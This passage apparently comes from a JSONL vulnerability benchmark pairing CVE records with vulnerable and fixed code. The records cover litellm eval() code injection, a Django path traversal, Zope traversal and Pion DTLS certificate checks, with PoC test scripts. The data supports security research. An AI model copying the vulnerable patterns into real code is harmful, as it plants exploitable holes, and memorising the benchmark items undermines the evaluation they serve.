b/src/Products/PageTemplates/expression.py\n@@ -6,8 +6,16 @@\n \n while path_items:\n name = path_items.pop()\n+\n+ if name == '_':\n+ warnings.warn('Traversing to the name `_` is deprecated '\n+ 'and will be removed in Zope 6.',\n+ DeprecationWarning)\n+ elif name.startswith('_'):\n+ raise NotFound(name)\n+\n if ITraversable.providedBy(base):\n- base = getattr(base, cls.traverseMethod)(name)\n+ base = getattr(base, cls.traverse_method)(name)\n else:\n base = traversePathElement(base, name, path_items,\n request=request)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-5751", "cve_description": "BerriAI/litellm version v1.35.8 contains a vulnerability where an attacker can achieve remote code execution. The vulnerability exists in the `add_deployment` function, which decodes and decrypts environment variables from base64 and assigns them to `os.environ`. An attacker can exploit this by sending a malicious payload to the `/config/update` endpoint, which is then processed and executed by the server when the `get_secret` function is triggered. This requires the server to use Google KMS and a database to store a model.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/BerriAI/litellm", "patch_url": ["https://github.com/BerriAI/litellm/commit/fcea4c22ad96b24436f196ae709f71932e84b0b8"], "programing_language": "Python", "vul_func": [{"id": "vul_py_224_1", "commit": "2b9e953", "file_path": "litellm/utils.py", "start_line": 7065, "end_line": 7274, "snippet": "def get_secret(\n secret_name: str,\n default_value: Optional[Union[str, bool]] = None,\n):\n key_management_system = litellm._key_management_system\n key_management_settings = litellm._key_management_settings\n args = locals()\n\n if secret_name.startswith(\"os.environ/\"):\n secret_name = secret_name.replace(\"os.environ/\", \"\")\n\n # Example: oidc/google/https://bedrock-runtime.us-east-1.amazonaws.com/model/stability.stable-diffusion-xl-v1/invoke\n if secret_name.startswith(\"oidc/\"):\n secret_name_split = secret_name.replace(\"oidc/\", \"\")\n oidc_provider, oidc_aud = secret_name_split.split(\"/\", 1)\n # TODO: Add caching for HTTP requests\n if oidc_provider == \"google\":\n oidc_token = oidc_cache.get_cache(key=secret_name)\n if oidc_token is not None:\n return oidc_token\n\n oidc_client = HTTPHandler(timeout=httpx.Timeout(timeout=600.0, connect=5.0))\n # https://cloud.google.com/compute/docs/instances/verifying-instance-identity#request_signature\n response = oidc_client.get(\n \"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/identity\",\n params={\"audience\": oidc_aud},\n headers={\"Metadata-Flavor\": \"Google\"},\n )\n if response.status_code == 200:\n oidc_token = response.text\n oidc_cache.set_cache(key=secret_name, value=oidc_token, ttl=3600 - 60)\n return oidc_token\n else:\n raise ValueError(\"Google OIDC provider failed\")\n elif oidc_provider == \"circleci\":\n # https://circleci.com/docs/openid-connect-tokens/\n env_secret = os.getenv(\"CIRCLE_OIDC_TOKEN\")\n if env_secret is None:\n raise ValueError(\"CIRCLE_OIDC_TOKEN not found in environment\")\n return env_secret\n elif oidc_provider == \"circleci_v2\":\n # https://circleci.com/docs/openid-connect-tokens/\n env_secret = os.getenv(\"CIRCLE_OIDC_TOKEN_V2\")\n if env_secret is None:\n raise ValueError(\"CIRCLE_OIDC_TOKEN_V2 not found in environment\")\n return env_secret\n elif oidc_provider == \"github\":\n # https://docs.github.com/en/actions/deployment/security-hardening-your-deployments/configuring-openid-connect-in-cloud-providers#using-custom-actions\n actions_id_token_request_url = os.getenv(\"ACTIONS_ID_TOKEN_REQUEST_URL\")\n actions_id_token_request_token = os.getenv(\"ACTIONS_ID_TOKEN_REQUEST_TOKEN\")\n if (\n actions_id_token_request_url is None\n or actions_id_token_request_token is None\n ):\n raise ValueError(\n \"ACTIONS_ID_TOKEN_REQUEST_URL or ACTIONS_ID_TOKEN_REQUEST_TOKEN not found in environment\"\n )\n\n oidc_token = oidc_cache.get_cache(key=secret_name)\n if oidc_token is not None:\n return oidc_token\n\n oidc_client = HTTPHandler(timeout=httpx.Timeout(timeout=600.0, connect=5.0))\n response = oidc_client.get(\n actions_id_token_request_url,\n params={\"audience\": oidc_aud},\n headers={\n \"Authorization\": f\"Bearer {actions_id_token_request_token}\",\n \"Accept\": \"application/json; api-version=2.0\",\n },\n )\n if response.status_code == 200:\n oidc_token = response.text[\"value\"]\n oidc_cache.set_cache(key=secret_name, value=oidc_token, ttl=300 - 5)\n return oidc_token\n else:\n raise ValueError(\"Github OIDC provider failed\")\n elif oidc_provider == \"azure\":\n # https://azure.github.io/azure-workload-identity/docs/quick-start.html\n azure_federated_token_file = os.getenv(\"AZURE_FEDERATED_TOKEN_FILE\")\n if azure_federated_token_file is None:\n raise ValueError(\"AZURE_FEDERATED_TOKEN_FILE not found in environment\")\n with open(azure_federated_token_file, \"r\") as f:\n oidc_token = f.read()\n return oidc_token\n else:\n raise ValueError(\"Unsupported OIDC provider\")\n\n try:\n if litellm.secret_manager_client is not None:\n try:\n client = litellm.secret_manager_client\n key_manager = \"local\"\n if key_management_system is not None:\n key_manager = key_management_system.value\n\n if key_management_settings is not None:\n if (\n secret_name not in key_management_settings.hosted_keys\n ): # allow user to specify which keys to check in hosted key manager\n key_manager = \"local\"\n\n if (\n key_manager == KeyManagementSystem.AZURE_KEY_VAULT.value\n or type(client).__module__ + \".\" + type(client).__name__\n == \"azure.keyvault.secrets._client.SecretClient\"\n ): # support Azure Secret Client - from azure.keyvault.secrets import SecretClient\n secret = client.get_secret(secret_name).value\n elif (\n key_manager == KeyManagementSystem.GOOGLE_KMS.value\n or client.__class__.__name__ == \"KeyManagementServiceClient\"\n ):\n encrypted_secret: Any = os.getenv(secret_name)\n if encrypted_secret is None:\n raise ValueError(\n f\"Google KMS requires the encrypted secret to be in the environment!\"\n )\n b64_flag = _is_base64(encrypted_secret)\n if b64_flag == True: # if passed in as encoded b64 string\n encrypted_secret = base64.b64decode(encrypted_secret)\n if not isinstance(encrypted_secret, bytes):\n # If it's not, assume it's a string and encode it to bytes\n ciphertext = eval(\n encrypted_secret.encode()\n ) # assuming encrypted_secret is something like - b'\\n$\\x00D\\xac\\xb4/t)07\\xe5\\xf6..'\n else:\n ciphertext = encrypted_secret\n\n response = client.decrypt(\n request={\n \"name\": litellm._google_kms_resource_name,\n \"ciphertext\": ciphertext,\n }\n )\n secret = response.plaintext.decode(\n \"utf-8\"\n ) # assumes the original value was encoded with utf-8\n elif key_manager == KeyManagementSystem.AWS_KMS.value:\n \"\"\"\n Only check the tokens which start with 'aws_kms/'. This prevents latency impact caused by checking all keys.\n \"\"\"\n encrypted_value = os.getenv(secret_name, None)\n if encrypted_value is None:\n raise Exception(\"encrypted value for AWS KMS cannot be None.\")\n # Decode the base64 encoded ciphertext\n ciphertext_blob = base64.b64decode(encrypted_value)\n\n # Set up the parameters for the decrypt call\n params = {\"CiphertextBlob\": ciphertext_blob}\n\n # Perform the decryption\n response = client.decrypt(**params)\n\n # Extract and decode the plaintext\n plaintext = response[\"Plaintext\"]\n secret = plaintext.decode(\"utf-8\")\n elif key_manager == KeyManagementSystem.AWS_SECRET_MANAGER.value:\n try:\n get_secret_value_response = client.get_secret_value(\n SecretId=secret_name\n )\n print_verbose(\n f\"get_secret_value_response: {get_secret_value_response}\"\n )\n except Exception as e:\n print_verbose(f\"An error occurred - {str(e)}\")\n # For a list of exceptions thrown, see\n # https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html\n raise e\n\n # assume there is 1 secret per secret_name\n secret_dict = json.loads(get_secret_value_response[\"SecretString\"])\n print_verbose(f\"secret_dict: {secret_dict}\")\n for k, v in secret_dict.items():\n secret = v\n print_verbose(f\"secret: {secret}\")\n elif key_manager == \"local\":\n secret = os.getenv(secret_name)\n else: # assume the default is infisicial client\n secret = client.get_secret(secret_name).secret_value\n except Exception as e: # check if it's in os.environ\n verbose_logger.error(\n f\"An exception occurred - {str(e)}\\n\\n{traceback.format_exc()}\"\n )\n secret = os.getenv(secret_name)\n try:\n secret_value_as_bool = ast.literal_eval(secret)\n if isinstance(secret_value_as_bool, bool):\n return secret_value_as_bool\n else:\n return secret\n except:\n return secret\n else:\n secret = os.environ.get(secret_name)\n try:\n secret_value_as_bool = (\n ast.literal_eval(secret) if secret is not None else None\n )\n if isinstance(secret_value_as_bool, bool):\n return secret_value_as_bool\n else:\n return secret\n except:\n return secret\n except Exception as e:\n if default_value is not None:\n return default_value\n else:\n raise e"}], "fix_func": [{"id": "fix_py_224_1", "commit": "fcea4c2", "file_path": "litellm/utils.py", "start_line": 7065, "end_line": 7271, "snippet": "def get_secret(\n secret_name: str,\n default_value: Optional[Union[str, bool]] = None,\n):\n key_management_system = litellm._key_management_system\n key_management_settings = litellm._key_management_settings\n args = locals()\n\n if secret_name.startswith(\"os.environ/\"):\n secret_name = secret_name.replace(\"os.environ/\", \"\")\n\n # Example: oidc/google/https://bedrock-runtime.us-east-1.amazonaws.com/model/stability.stable-diffusion-xl-v1/invoke\n if secret_name.startswith(\"oidc/\"):\n secret_name_split = secret_name.replace(\"oidc/\", \"\")\n oidc_provider, oidc_aud = secret_name_split.split(\"/\", 1)\n # TODO: Add caching for HTTP requests\n if oidc_provider == \"google\":\n oidc_token = oidc_cache.get_cache(key=secret_name)\n if oidc_token is not None:\n return oidc_token\n\n oidc_client = HTTPHandler(timeout=httpx.Timeout(timeout=600.0, connect=5.0))\n # https://cloud.google.com/compute/docs/instances/verifying-instance-identity#request_signature\n response = oidc_client.get(\n \"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/identity\",\n params={\"audience\": oidc_aud},\n headers={\"Metadata-Flavor\": \"Google\"},\n )\n if response.status_code == 200:\n oidc_token = response.text\n oidc_cache.set_cache(key=secret_name, value=oidc_token, ttl=3600 - 60)\n return oidc_token\n else:\n raise ValueError(\"Google OIDC provider failed\")\n elif oidc_provider == \"circleci\":\n # https://circleci.com/docs/openid-connect-tokens/\n env_secret = os.getenv(\"CIRCLE_OIDC_TOKEN\")\n if env_secret is None:\n raise ValueError(\"CIRCLE_OIDC_TOKEN not found in environment\")\n return env_secret\n elif oidc_provider == \"circleci_v2\":\n # https://circleci.com/docs/openid-connect-tokens/\n env_secret = os.getenv(\"CIRCLE_OIDC_TOKEN_V2\")\n if env_secret is None:\n raise ValueError(\"CIRCLE_OIDC_TOKEN_V2 not found in environment\")\n return env_secret\n elif oidc_provider == \"github\":\n # https://docs.github.com/en/actions/deployment/security-hardening-your-deployments/configuring-openid-connect-in-cloud-providers#using-custom-actions\n actions_id_token_request_url = os.getenv(\"ACTIONS_ID_TOKEN_REQUEST_URL\")\n actions_id_token_request_token = os.getenv(\"ACTIONS_ID_TOKEN_REQUEST_TOKEN\")\n if (\n actions_id_token_request_url is None\n or actions_id_token_request_token is None\n ):\n raise ValueError(\n \"ACTIONS_ID_TOKEN_REQUEST_URL or ACTIONS_ID_TOKEN_REQUEST_TOKEN not found in environment\"\n )\n\n oidc_token = oidc_cache.get_cache(key=secret_name)\n if oidc_token is not None:\n return oidc_token\n\n oidc_client = HTTPHandler(timeout=httpx.Timeout(timeout=600.0, connect=5.0))\n response = oidc_client.get(\n actions_id_token_request_url,\n params={\"audience\": oidc_aud},\n headers={\n \"Authorization\": f\"Bearer {actions_id_token_request_token}\",\n \"Accept\": \"application/json; api-version=2.0\",\n },\n )\n if response.status_code == 200:\n oidc_token = response.text[\"value\"]\n oidc_cache.set_cache(key=secret_name, value=oidc_token, ttl=300 - 5)\n return oidc_token\n else:\n raise ValueError(\"Github OIDC provider failed\")\n elif oidc_provider == \"azure\":\n # https://azure.github.io/azure-workload-identity/docs/quick-start.html\n azure_federated_token_file = os.getenv(\"AZURE_FEDERATED_TOKEN_FILE\")\n if azure_federated_token_file is None:\n raise ValueError(\"AZURE_FEDERATED_TOKEN_FILE not found in environment\")\n with open(azure_federated_token_file, \"r\") as f:\n oidc_token = f.read()\n return oidc_token\n else:\n raise ValueError(\"Unsupported OIDC provider\")\n\n try:\n if litellm.secret_manager_client is not None:\n try:\n client = litellm.secret_manager_client\n key_manager = \"local\"\n if key_management_system is not None:\n key_manager = key_management_system.value\n\n if key_management_settings is not None:\n if (\n secret_name not in key_management_settings.hosted_keys\n ): # allow user to specify which keys to check in hosted key manager\n key_manager = \"local\"\n\n if (\n key_manager == KeyManagementSystem.AZURE_KEY_VAULT.value\n or type(client).__module__ + \".\" + type(client).__name__\n == \"azure.keyvault.secrets._client.SecretClient\"\n ): # support Azure Secret Client - from azure.keyvault.secrets import SecretClient\n secret = client.get_secret(secret_name).value\n elif (\n key_manager == KeyManagementSystem.GOOGLE_KMS.value\n or client.__class__.__name__ == \"KeyManagementServiceClient\"\n ):\n encrypted_secret: Any = os.getenv(secret_name)\n if encrypted_secret is None:\n raise ValueError(\n f\"Google KMS requires the encrypted secret to be in the environment!\"\n )\n b64_flag = _is_base64(encrypted_secret)\n if b64_flag == True: # if passed in as encoded b64 string\n encrypted_secret = base64.b64decode(encrypted_secret)\n ciphertext = encrypted_secret\n else:\n raise ValueError(\n f\"Google KMS requires the encrypted secret to be encoded in base64\"\n )#fix for this vulnerability https://huntr.com/bounties/ae623c2f-b64b-4245-9ed4-f13a0a5824ce\n response = client.decrypt(\n request={\n \"name\": litellm._google_kms_resource_name,\n \"ciphertext\": ciphertext,\n }\n )\n secret = response.plaintext.decode(\n \"utf-8\"\n ) # assumes the original value was encoded with utf-8\n elif key_manager == KeyManagementSystem.AWS_KMS.value:\n \"\"\"\n Only check the tokens which start with 'aws_kms/'. This prevents latency impact caused by checking all keys.\n \"\"\"\n encrypted_value = os.getenv(secret_name, None)\n if encrypted_value is None:\n raise Exception(\"encrypted value for AWS KMS cannot be None.\")\n # Decode the base64 encoded ciphertext\n ciphertext_blob = base64.b64decode(encrypted_value)\n\n # Set up the parameters for the decrypt call\n params = {\"CiphertextBlob\": ciphertext_blob}\n\n # Perform the decryption\n response = client.decrypt(**params)\n\n # Extract and decode the plaintext\n plaintext = response[\"Plaintext\"]\n secret = plaintext.decode(\"utf-8\")\n elif key_manager == KeyManagementSystem.AWS_SECRET_MANAGER.value:\n try:\n get_secret_value_response = client.get_secret_value(\n SecretId=secret_name\n )\n print_verbose(\n f\"get_secret_value_response: {get_secret_value_response}\"\n )\n except Exception as e:\n print_verbose(f\"An error occurred - {str(e)}\")\n # For a list of exceptions thrown, see\n # https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html\n raise e\n\n # assume there is 1 secret per secret_name\n secret_dict = json.loads(get_secret_value_response[\"SecretString\"])\n print_verbose(f\"secret_dict: {secret_dict}\")\n for k, v in secret_dict.items():\n secret = v\n print_verbose(f\"secret: {secret}\")\n elif key_manager == \"local\":\n secret = os.getenv(secret_name)\n else: # assume the default is infisicial client\n secret = client.get_secret(secret_name).secret_value\n except Exception as e: # check if it's in os.environ\n verbose_logger.error(\n f\"An exception occurred - {str(e)}\\n\\n{traceback.format_exc()}\"\n )\n secret = os.getenv(secret_name)\n try:\n secret_value_as_bool = ast.literal_eval(secret)\n if isinstance(secret_value_as_bool, bool):\n return secret_value_as_bool\n else:\n return secret\n except:\n return secret\n else:\n secret = os.environ.get(secret_name)\n try:\n secret_value_as_bool = (\n ast.literal_eval(secret) if secret is not None else None\n )\n if isinstance(secret_value_as_bool, bool):\n return secret_value_as_bool\n else:\n return secret\n except:\n return secret\n except Exception as e:\n if default_value is not None:\n return default_value\n else:\n raise e"}], "vul_patch": "--- a/litellm/utils.py\n+++ b/litellm/utils.py\n@@ -118,14 +118,11 @@\n b64_flag = _is_base64(encrypted_secret)\n if b64_flag == True: # if passed in as encoded b64 string\n encrypted_secret = base64.b64decode(encrypted_secret)\n- if not isinstance(encrypted_secret, bytes):\n- # If it's not, assume it's a string and encode it to bytes\n- ciphertext = eval(\n- encrypted_secret.encode()\n- ) # assuming encrypted_secret is something like - b'\\n$\\x00D\\xac\\xb4/t)07\\xe5\\xf6..'\n+ ciphertext = encrypted_secret\n else:\n- ciphertext = encrypted_secret\n-\n+ raise ValueError(\n+ f\"Google KMS requires the encrypted secret to be encoded in base64\"\n+ )#fix for this vulnerability https://huntr.com/bounties/ae623c2f-b64b-4245-9ed4-f13a0a5824ce\n response = client.decrypt(\n request={\n \"name\": litellm._google_kms_resource_name,\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-33203", "cve_description": "Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. In other words, there is directory traversal outside of the template root directories.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/django/django", "patch_url": ["https://github.com/django/django/commit/20c67a0693c4ede2b09af02574823485e82e4c8f", "https://github.com/django/django/commit/dfaba12cda060b8b292ae1d271b44bf810b1c5b9", "https://github.com/django/django/commit/053cc9534d174dc89daba36724ed2dcb36755b90"], "programing_language": "Python", "vul_func": [{"id": "vul_py_6_1", "commit": "aa8781c", "file_path": "django/contrib/admindocs/views.py", "start_line": 321, "end_line": 347, "snippet": " def get_context_data(self, **kwargs):\n template = self.kwargs['template']\n templates = []\n try:\n default_engine = Engine.get_default()\n except ImproperlyConfigured:\n # Non-trivial TEMPLATES settings aren't supported (#24125).\n pass\n else:\n # This doesn't account for template loaders (#24128).\n for index, directory in enumerate(default_engine.dirs):\n template_file = Path(directory) / template\n if template_file.exists():\n template_contents = template_file.read_text()\n else:\n template_contents = ''\n templates.append({\n 'file': template_file,\n 'exists': template_file.exists(),\n 'contents': template_contents,\n 'order': index,\n })\n return super().get_context_data(**{\n **kwargs,\n 'name': template,\n 'templates': templates,\n })"}], "fix_func": [{"id": "fix_py_6_1", "commit": "20c67a0", "file_path": "django/contrib/admindocs/views.py", "start_line": 322, "end_line": 348, "snippet": " def get_context_data(self, **kwargs):\n template = self.kwargs['template']\n templates = []\n try:\n default_engine = Engine.get_default()\n except ImproperlyConfigured:\n # Non-trivial TEMPLATES settings aren't supported (#24125).\n pass\n else:\n # This doesn't account for template loaders (#24128).\n for index, directory in enumerate(default_engine.dirs):\n template_file = Path(safe_join(directory, template))\n if template_file.exists():\n template_contents = template_file.read_text()\n else:\n template_contents = ''\n templates.append({\n 'file': template_file,\n 'exists': template_file.exists(),\n 'contents': template_contents,\n 'order': index,\n })\n return super().get_context_data(**{\n **kwargs,\n 'name': template,\n 'templates': templates,\n })"}], "vul_patch": "--- a/django/contrib/admindocs/views.py\n+++ b/django/contrib/admindocs/views.py\n@@ -9,7 +9,7 @@\n else:\n # This doesn't account for template loaders (#24128).\n for index, directory in enumerate(default_engine.dirs):\n- template_file = Path(directory) / template\n+ template_file = Path(safe_join(directory, template))\n if template_file.exists():\n template_contents = template_file.read_text()\n else:\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-33203:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/django\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ncd tests && /workspace/PoC_env/CVE-2021-33203/bin/python ./runtests.py admin_docs.test_views.AdminDocViewDefaultEngineOnly.test_template_detail_path_traversal\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-33203:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/django\ngit apply --whitespace=nowarn /workspace/fix.patch\ncd tests && /workspace/PoC_env/CVE-2021-33203/bin/python ./runtests.py admin_docs.test_views\n"} {"cve_id": "CVE-2022-29222", "cve_description": "Pion DTLS is a Go implementation of Datagram Transport Layer Security. Prior to version 2.1.5, a DTLS Client could provide a Certificate that it doesn't posses the private key for and Pion DTLS wouldn't reject it. This issue affects users that are using Client certificates only. The connection itself is still secure. The Certificate provided by clients can't be trusted when using a Pion DTLS server prior to version 2.1.5. Users should upgrade to version 2.1.5 to receive a patch. There are currently no known workarounds.", "cwe_info": {"CWE-295": {"name": "Improper Certificate Validation", "description": "The product does not validate, or incorrectly validates, a certificate."}}, "repo": "https://github.com/pion/dtls", "patch_url": ["https://github.com/pion/dtls/commit/d2f797183a9f044ce976e6df6f362662ca722412"], "programing_language": "Go", "vul_func": [{"id": "vul_go_87_1", "commit": "a6397ff", "file_path": "flight4handler.go", "start_line": "19", "end_line": "201", "snippet": "func flight4Parse(ctx context.Context, c flightConn, state *State, cache *handshakeCache, cfg *handshakeConfig) (flightVal, *alert.Alert, error) { //nolint:gocognit\n\tseq, msgs, ok := cache.fullPullMap(state.handshakeRecvSequence, state.cipherSuite,\n\t\thandshakeCachePullRule{handshake.TypeCertificate, cfg.initialEpoch, true, true},\n\t\thandshakeCachePullRule{handshake.TypeClientKeyExchange, cfg.initialEpoch, true, false},\n\t\thandshakeCachePullRule{handshake.TypeCertificateVerify, cfg.initialEpoch, true, true},\n\t)\n\tif !ok {\n\t\t// No valid message received. Keep reading\n\t\treturn 0, nil, nil\n\t}\n\n\t// Validate type\n\tvar clientKeyExchange *handshake.MessageClientKeyExchange\n\tif clientKeyExchange, ok = msgs[handshake.TypeClientKeyExchange].(*handshake.MessageClientKeyExchange); !ok {\n\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, nil\n\t}\n\n\tif h, hasCert := msgs[handshake.TypeCertificate].(*handshake.MessageCertificate); hasCert {\n\t\tstate.PeerCertificates = h.Certificate\n\t\t// If the client offer its certificate, just disable session resumption.\n\t\t// Otherwise, we have to store the certificate identitfication and expire time.\n\t\t// And we have to check whether this certificate expired, revoked or changed.\n\t\t//\n\t\t// https://curl.se/docs/CVE-2016-5419.html\n\t\tstate.SessionID = nil\n\t}\n\n\tif h, hasCertVerify := msgs[handshake.TypeCertificateVerify].(*handshake.MessageCertificateVerify); hasCertVerify {\n\t\tif state.PeerCertificates == nil {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.NoCertificate}, errCertificateVerifyNoCertificate\n\t\t}\n\n\t\tplainText := cache.pullAndMerge(\n\t\t\thandshakeCachePullRule{handshake.TypeClientHello, cfg.initialEpoch, true, false},\n\t\t\thandshakeCachePullRule{handshake.TypeServerHello, cfg.initialEpoch, false, false},\n\t\t\thandshakeCachePullRule{handshake.TypeCertificate, cfg.initialEpoch, false, false},\n\t\t\thandshakeCachePullRule{handshake.TypeServerKeyExchange, cfg.initialEpoch, false, false},\n\t\t\thandshakeCachePullRule{handshake.TypeCertificateRequest, cfg.initialEpoch, false, false},\n\t\t\thandshakeCachePullRule{handshake.TypeServerHelloDone, cfg.initialEpoch, false, false},\n\t\t\thandshakeCachePullRule{handshake.TypeCertificate, cfg.initialEpoch, true, false},\n\t\t\thandshakeCachePullRule{handshake.TypeClientKeyExchange, cfg.initialEpoch, true, false},\n\t\t)\n\n\t\t// Verify that the pair of hash algorithm and signiture is listed.\n\t\tvar validSignatureScheme bool\n\t\tfor _, ss := range cfg.localSignatureSchemes {\n\t\t\tif ss.Hash == h.HashAlgorithm && ss.Signature == h.SignatureAlgorithm {\n\t\t\t\tvalidSignatureScheme = true\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif !validSignatureScheme {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InsufficientSecurity}, errNoAvailableSignatureSchemes\n\t\t}\n\n\t\tif err := verifyCertificateVerify(plainText, h.HashAlgorithm, h.Signature, state.PeerCertificates); err != nil {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.BadCertificate}, err\n\t\t}\n\t\tvar chains [][]*x509.Certificate\n\t\tvar err error\n\t\tvar verified bool\n\t\tif cfg.clientAuth >= VerifyClientCertIfGiven {\n\t\t\tif chains, err = verifyClientCert(state.PeerCertificates, cfg.clientCAs); err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.BadCertificate}, err\n\t\t\t}\n\t\t\tverified = true\n\t\t}\n\t\tif cfg.verifyPeerCertificate != nil {\n\t\t\tif err := cfg.verifyPeerCertificate(state.PeerCertificates, chains); err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.BadCertificate}, err\n\t\t\t}\n\t\t}\n\t\tstate.peerCertificatesVerified = verified\n\t}\n\n\tif !state.cipherSuite.IsInitialized() {\n\t\tserverRandom := state.localRandom.MarshalFixed()\n\t\tclientRandom := state.remoteRandom.MarshalFixed()\n\n\t\tvar err error\n\t\tvar preMasterSecret []byte\n\t\tif state.cipherSuite.AuthenticationType() == CipherSuiteAuthenticationTypePreSharedKey {\n\t\t\tvar psk []byte\n\t\t\tif psk, err = cfg.localPSKCallback(clientKeyExchange.IdentityHint); err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t\t}\n\t\t\tstate.IdentityHint = clientKeyExchange.IdentityHint\n\t\t\tswitch state.cipherSuite.KeyExchangeAlgorithm() {\n\t\t\tcase CipherSuiteKeyExchangeAlgorithmPsk:\n\t\t\t\tpreMasterSecret = prf.PSKPreMasterSecret(psk)\n\t\t\tcase (CipherSuiteKeyExchangeAlgorithmPsk | CipherSuiteKeyExchangeAlgorithmEcdhe):\n\t\t\t\tif preMasterSecret, err = prf.EcdhePSKPreMasterSecret(psk, clientKeyExchange.PublicKey, state.localKeypair.PrivateKey, state.localKeypair.Curve); err != nil {\n\t\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t\t\t}\n\t\t\tdefault:\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, errInvalidCipherSuite\n\t\t\t}\n\t\t} else {\n\t\t\tpreMasterSecret, err = prf.PreMasterSecret(clientKeyExchange.PublicKey, state.localKeypair.PrivateKey, state.localKeypair.Curve)\n\t\t\tif err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.IllegalParameter}, err\n\t\t\t}\n\t\t}\n\n\t\tif state.extendedMasterSecret {\n\t\t\tvar sessionHash []byte\n\t\t\tsessionHash, err = cache.sessionHash(state.cipherSuite.HashFunc(), cfg.initialEpoch)\n\t\t\tif err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t\t}\n\n\t\t\tstate.masterSecret, err = prf.ExtendedMasterSecret(preMasterSecret, sessionHash, state.cipherSuite.HashFunc())\n\t\t\tif err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t\t}\n\t\t} else {\n\t\t\tstate.masterSecret, err = prf.MasterSecret(preMasterSecret, clientRandom[:], serverRandom[:], state.cipherSuite.HashFunc())\n\t\t\tif err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t\t}\n\t\t}\n\n\t\tif err := state.cipherSuite.Init(state.masterSecret, clientRandom[:], serverRandom[:], false); err != nil {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t}\n\t\tcfg.writeKeyLog(keyLogLabelTLS12, clientRandom[:], state.masterSecret)\n\t}\n\n\tif len(state.SessionID) > 0 {\n\t\ts := Session{\n\t\t\tID: state.SessionID,\n\t\t\tSecret: state.masterSecret,\n\t\t}\n\t\tcfg.log.Tracef(\"[handshake] save new session: %x\", s.ID)\n\t\tif err := cfg.sessionStore.Set(state.SessionID, s); err != nil {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t}\n\t}\n\n\t// Now, encrypted packets can be handled\n\tif err := c.handleQueuedPackets(ctx); err != nil {\n\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t}\n\n\tseq, msgs, ok = cache.fullPullMap(seq, state.cipherSuite,\n\t\thandshakeCachePullRule{handshake.TypeFinished, cfg.initialEpoch + 1, true, false},\n\t)\n\tif !ok {\n\t\t// No valid message received. Keep reading\n\t\treturn 0, nil, nil\n\t}\n\tstate.handshakeRecvSequence = seq\n\n\tif _, ok = msgs[handshake.TypeFinished].(*handshake.MessageFinished); !ok {\n\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, nil\n\t}\n\n\tif state.cipherSuite.AuthenticationType() == CipherSuiteAuthenticationTypeAnonymous {\n\t\treturn flight6, nil, nil\n\t}\n\n\tswitch cfg.clientAuth {\n\tcase RequireAnyClientCert:\n\t\tif state.PeerCertificates == nil {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.NoCertificate}, errClientCertificateRequired\n\t\t}\n\tcase VerifyClientCertIfGiven:\n\t\tif state.PeerCertificates != nil && !state.peerCertificatesVerified {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.BadCertificate}, 